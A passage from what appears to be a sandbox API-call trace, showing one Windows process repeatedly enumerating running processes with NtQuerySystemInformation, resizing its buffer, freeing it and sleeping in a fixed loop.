RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.270] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.569] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.599] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.638] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.654] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.670] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.700] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.716] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.760] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.784] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.794] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.810] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.825] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.841] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.873] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.888] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.904] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 